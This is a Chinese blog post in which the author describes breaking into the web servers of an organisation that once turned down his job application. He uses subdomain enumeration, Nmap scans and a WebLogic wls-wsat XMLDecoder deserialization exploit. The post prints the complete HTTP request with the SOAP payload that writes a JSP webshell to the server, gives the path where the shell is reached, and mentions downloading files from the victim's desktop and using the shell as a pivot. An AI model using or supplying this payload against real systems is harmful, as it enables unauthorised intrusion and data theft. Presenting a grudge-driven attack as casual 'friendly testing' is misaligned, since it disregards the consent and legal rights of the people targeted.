对某单位的一次测试weblogic漏洞的利用

前言

我这个人不知道怎么回事,对一个曾今拒绝过我的单位总有一些莫名的兴趣,那个单位在前年最困难的时候没帮助我,我投了简历,但是HR就看了一下吧!(谁知道看了没?)

结果前两天就开始对他们的官方网站开始友情的测试,本身他们的网站已经被我拿下过,站是在他们内网搭建的,那个时候是旁站存在一个sturts2的反序列化漏洞,可以说是直接秒了的,而且进去之后看到他们网站上的马之多,基本属于那种被搞烂了的情况,过后就出了新的信息安全法,所以也就没。

前段时间需要一个跳板,结果发现那个shell已经掉了,主站已经完全改版了,并且这次不存在旁站,下面就开始正式的所有故事。

故事的开头

既然主站已经不存在漏洞了,那么我只有收集他的二级域名,说不定还有其他业务在他们内网中,所以就很简单的开始信息收集了。

目标:www.2kb.me

 

经过一番捣鼓之后找到一个可疑的网站,mail.2kb.me

打开一开是winmail

 

马上去网上搜一下爆出来的相关漏洞,很显然,并没有什么卵用。

通过Nmap扫了一番之后发现开了很多端口,这里开始以为22端口是一个Linux的机器,结果还有一些端口是IIS的服务,访问了一下果真是IIS,但是没有站在上面,然后按个的尝试每一个有用的端口上的服务,

峰回路转

除了那两个IIS根本就没有什么服务之外几个业务和内部开发的服务用扫描器扫描一圈之后没有明显的漏洞之后找到了一个东西,当时心里感觉有戏。

 

本身之前对这个不是很熟悉的,网上搜了一圈之后发现weblogic有几个漏洞,在T00LS上面搜一下,刚好前不久有道友给总结了一下  T00LS上weblogic总结传送门

开始懵逼,心态爆炸

因为是第一次遇到weblogic,虽然网上也给出了很多关于weblogic的漏洞利用exp,(后来在等到webshell的时候才看到传到其他的目录去了,也是一整懵逼),因为在这里捣鼓了很长时间,下午还给公司同事进行培训,结果后来继续的时候发现还是没成功,心态差点就爆炸,关键的关键是

我一个基友成功的上传了一个执行命令的小马,所以心态真的很炸,也不知道到底是哪里出了问题,burp的回显跟网上那些大神给出的图也不一样。

 

辗转腾挪

这里也不卖什么关子直接上图

虽然回显是错误的,但是也没有问题,东西上传成功没有还得自己去访问看。这里需要的是POST   URL:2kb.me:7001:/wls-wsat/CoordinatorPortType  在头包里面添加

Upgrade-Insecure-Requests: 1

Content-Type: text/xml

完整的信息如下

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 2kb.me:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Upgrade-Insecure-Requests: 1
Content-Type: text/xml
Content-Length: 10006

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java>
        <java version="1.4.0" class="java.beans.XMLDecoder">
          <object class="java.io.PrintWriter">
            <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/h.jsp</string>
            <void method="println">
              <string><![CDATA[
这里填入你的马
                ]]></string>
            </void>
            <void method="close"/>
          </object>
        </java>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>

代码复制的话直接点击上面的复制按钮

访问的地址会在2kb.me:7001/bea_wls_internal/h.jsp

之前的弯路就是一直传到其他目录去了,我也不知道为什么,明明地址也是对的 哭瞎!

结果

结果发现Oracle的那个登录口有一个弱口令,我怎么知道的?我从他们桌面下载的开发文档里面看到的,简直了,如果弱口令那里可以早点利用上的话可以直接上传马就要剩下很多事情了。

不过,我把可能利用的地方利用成功了,也就作罢

aimorc

我还没有学会写个人说明!

1 条评论

  1. 不错不错

Leave a Reply

Your email address will not be published. Required fields are marked *

微信扫一扫,分享到朋友圈

对某单位的一次测试weblogic漏洞的利用
返回顶部

显示

忘记密码?

显示

显示

获取验证码

Close